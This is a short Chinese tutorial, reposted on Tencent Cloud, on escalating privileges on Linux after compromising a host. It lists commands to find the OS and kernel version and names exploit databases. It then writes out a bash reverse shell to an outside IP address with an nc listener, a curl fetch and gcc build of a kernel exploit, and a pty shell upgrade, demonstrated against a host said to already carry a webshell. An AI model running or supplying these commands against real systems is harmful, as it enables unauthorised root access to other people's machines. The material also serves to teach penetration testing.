Linux提权学习

系统漏洞提权

1、获取操作系统版本号

2、根据版本号搜索exp

3、反弹shell

4、尝试利用

1、获取系统版本号:

获取发行版本

• cat /etc/issue

• cat /etc/*-release

• cat /etc/lsb-release

• cat /etc/redhat-release

获取内核版本

• cat /proc/version

• uname -a

• uname -mrs

• rpm -q kernel

• dmesg | grep Linux

• ls /boot | grep vmlinuz

2、搜索exp获取内核版本

• http://www.exploit-db.com

• http://1337day.com

• http://www.securiteam.com

• http://www.securityfocus.com

• http://www.exploitsearch.net

• http://metasploit.com/modules/

• http://securityreason.com

• http://seclists.org/fulldisclosure/

• http://www.google.com

3.反弹shell

自己主机使用nc监听端口

nc -l -p 8080

目标服务器运行

/bin/bash -i >& /dev/tcp/114.115.214.203/8888 0<&1

实例演示:

此时http://10.22.5.70/dahuiji.php 已经取得一个webshell

首先获取操作系统版本号

搜索exp

反弹shell

/bin/bash -i >& /dev/tcp/114.115.214.203/8888 0<&1

尝试利用exp

curl https://www.exploit-db.com/download/35370 > exp.c

gcc编译一下 exp.c 生成exp

gcc exp.c -o exp -lpthread

使用python -c ‘import pty; pty.spawn(“/bin/bash”)’ 增加交互的

python -c ‘import pty; pty.spawn(“/bin/bash”)’

效果

本文分享自微信公众号 - Linux知识积累(LinuxLearning365)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-07-09

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏乐百川的学习频道

pyenv快速入门

版权声明:本文为博主原创文章,转载请注明出处。 ...

10930
来自专栏成长道路

oozie action参数传递

File file = new File(System.getProperty("oozie.action.output.properties"));

17220
来自专栏Ryan Miao

构建以及运行Springboot Docker镜像时的变量传递

Docker可以把我们的运行环境打包,然后我们只要run就可以了。大部分hello world都是这么写的。但都缺少了实际应用环节。以springboot为例,...

20320
来自专栏运维经验分享

CentOS下对shell脚本加密的二种方法

 版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/sinat_37757403/article/details...

18440
来自专栏浩Coding

小白Linux入门--入门篇(二):Linux下的shell编程入门

我们在Linux下编程,不可避免的会用到shell编程,编写一些简单的shell脚本可以实现很多使用的功能,比如我们微信公众号需要用到的开机tomcat和n...

10230
来自专栏呼延

终端复用利器 Tmux

一般情况下 tmux 中所有的快捷键都需要和前缀快捷键 ⌃b 来组合使用(注:⌃ 为 Mac 的 control 键.

13020
来自专栏liulun

centos安装mongodb 4.x及配置用户名密码(官方推荐的方式)

先在本地用记事本做一个这样的文件(命名为:mongodb-org-4.0.repo):

20830
来自专栏10km的专栏

linux/shell:读取包含'.'键名的.properties文件

如果properties中的key名只是由字母数字组成,那读取properties中的property很简单,示例如下:

26740
来自专栏技术栈大杂烩

Linux:system 调用引发的 getcwd 异常

我们有个功能是这样的:有个以 root 运行的 python 程序,它需要以 test 用户执行 linux 命令,所以就通过 subprocess 库 + s...

11720
来自专栏耕耘实录

Bash shell 中的字典

在一些运维工作中,使用字典能让当前工作事半功倍,类似 Python ,在 GNU bash 4.2.46 中,我们也可以很方便的使用字典来完成一些工作了。本文以...

13940

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励